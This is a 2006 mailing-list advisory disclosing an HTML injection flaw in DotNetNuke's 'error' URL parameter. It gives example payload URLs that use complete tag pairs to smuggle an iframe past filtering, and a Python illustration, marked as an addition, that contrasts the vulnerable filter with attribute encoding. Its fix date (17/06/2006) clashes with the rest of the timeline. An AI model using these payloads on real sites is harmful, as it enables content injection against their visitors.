Sep 20, 2006 - 12:00 a.m.

[Full-disclosure] DotNetNuke HTML Code Injection

2006-09-20 00:00:00
vulners.com

Security Advisory: VULN20-09-2006 -
http://www.secureshapes.com/advisories/vuln20-09-2006.htm

Vendor Security Bulletin:
http://dotnetnuke.com/About/WhatIsDotNetNuke/SecurityPolicy/SecurityBulletinno3/tabid/990/Default.aspx


DotNetNuke - HTML Code Injection Vulnerability

  • Date: 20/09/2006

  • Severity: Low

  • Impact: Code Injection

  • Solution Status: Vendor Patch

  • Version: All versions of DotNetNuke

  • Vendor Website: http://dotnetnuke.com/

:: ABOUT THE SOFTWARE

DotNetNuke® is an Open Source Framework ideal for creating Enterprise Web
Applications.

Unfortunately, DotNetNuke is vulnerable to HTML code injection.

:: TECHNICAL DESCRIPTION

The error parameter in the URL is reflected into the page and can be
manipulated, so it is possible to inject HTML code through it.

Example:

http://xxxxxx/Default.aspx?tabid=510&error=The+state+information+is+invalid+for+this+page+and+might+be+corrupted

It is possible to inject HTML code in that error variable.

In particular, it is also possible to reproduce the space character by
inserting complete HTML tags such as <script></script> and/or <form></form>
into the injected code. This allows the attacker to specify attributes in the
injected HTML tags.

Example:

http://xxxxxxxxxxxx/Default.aspx?tabid=510&error="<script></script>/><iframe<script></script>src=http://www.google.com>

or

http://xxxxxxxxxxxx/Default.aspx?tabid=510&error="<form></form>/><iframe<form></form>src=http://www.google.com>

In the HTML source code, this injection results in:

<form name="Form" method="post" action="/Default.aspx?tabid=510&error="
/><iframe src=http://www.google.com>" id="Form"
enctype="multipart/form-data" style="height: 100%;">

The space in the HTML code between iframe and src is produced by the complete
tag injected before it.
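As an added illustration, not code from the advisory or from DotNetNuke, the following Python models the reflection described above. It assumes a hypothetical blacklist filter that removes complete <script>...</script> and <form>...</form> pairs and leaves a space where each stood (which reproduces the effect the advisory observed), concatenates the filtered error value into the form's action attribute (the vulnerable pattern), and shows beside it the hardened pattern that attribute-encodes the value at output time. The placeholder host, the filter, the form template and the helper names are all assumptions.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed request URLs shaped like the advisory's examples; the host is a
# placeholder. The second carries the "<script></script>" payload from the text.
BENIGN_URL = ("http://example.invalid/Default.aspx?tabid=510"
              "&error=The+state+information+is+invalid+for+this+page")
INJECTED_URL = ("http://example.invalid/Default.aspx?tabid=510"
                '&error="<script></script>/><iframe<script></script>'
                "src=http://www.google.com>")

# Hypothetical blacklist filter (assumption, not DotNetNuke's code): drops each
# complete <script>...</script> or <form>...</form> pair and leaves one space in
# its place, which is what turns "<iframe<script></script>src" into "<iframe src".
DANGEROUS_PAIR = re.compile(r"<(script|form)[^>]*>.*?</\1>",
                            re.IGNORECASE | re.DOTALL)

# Assumed server-side template: the error value lands inside a quoted attribute.
FORM_TEMPLATE = ('<form name="Form" method="post" '
                 'action="/Default.aspx?tabid=510&amp;error={value}" id="Form">')


def error_param(url):
    """Return the decoded 'error' query-string value ('' if absent)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("error", [""])[0]


def strip_dangerous_tags(value):
    """Blacklist filtering: a space replaces every removed tag pair."""
    return DANGEROUS_PAIR.sub(" ", value)


def render_vulnerable(url):
    """Filter by blacklist, then concatenate raw into the attribute (the bug)."""
    return FORM_TEMPLATE.format(value=strip_dangerous_tags(error_param(url)))


def render_hardened(url):
    """Encode for an HTML attribute context at output time; no blacklist needed."""
    return FORM_TEMPLATE.format(value=html.escape(error_param(url), quote=True))


class _TagCollector(HTMLParser):
    """Records the start tags a browser-like parser sees in the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_seen(markup):
    """Tag names found in the rendered page fragment, in document order."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable),
                          ("hardened", render_hardened)):
        out = render(INJECTED_URL)
        print(f"{label}: tags={tags_seen(out)}\n  {out}")
```

Parsing the two renderings shows the difference that matters to a defender: with the blacklist alone, the leading quote in the value closes the action attribute and the browser sees a second element (iframe) the application never emitted, whereas attribute-encoding the value keeps the whole payload inside the attribute and the parser sees only the form tag. Encoding per output context is the fix; stripping known tags is not.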

:: VENDOR RESPONSE

The vendor security bulletin link is:

http://dotnetnuke.com/About/WhatIsDotNetNuke/SecurityPolicy/SecurityBulletinno3/tabid/990/Default.aspx

The patches are available here:

http://www.dotnetnuke.com/tabid/125/default.aspx - registration is needed in
order to download them

:: DISCLOSURE TIMEFRAME

04/09/2006 - Preliminary Vendor notification.

06/09/2006 - Vulnerability confirmed in all versions

17/06/2006 - DotNetNuke releases version 3.3.5 and 4.3.5 with fix

20/09/2006 - Coordinated public release.

Total Time to Fix: 13 days

:: CREDIT

The vulnerability was discovered by Roberto Suggi Liverani and Antonio Spera
of Secure Shapes.


About Secure Shapes

Secure Shapes Ltd provides vulnerability assessments, website penetration
testing, network penetration testing and security consultancy.

E-mail: contact [at] secureshapes.com


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/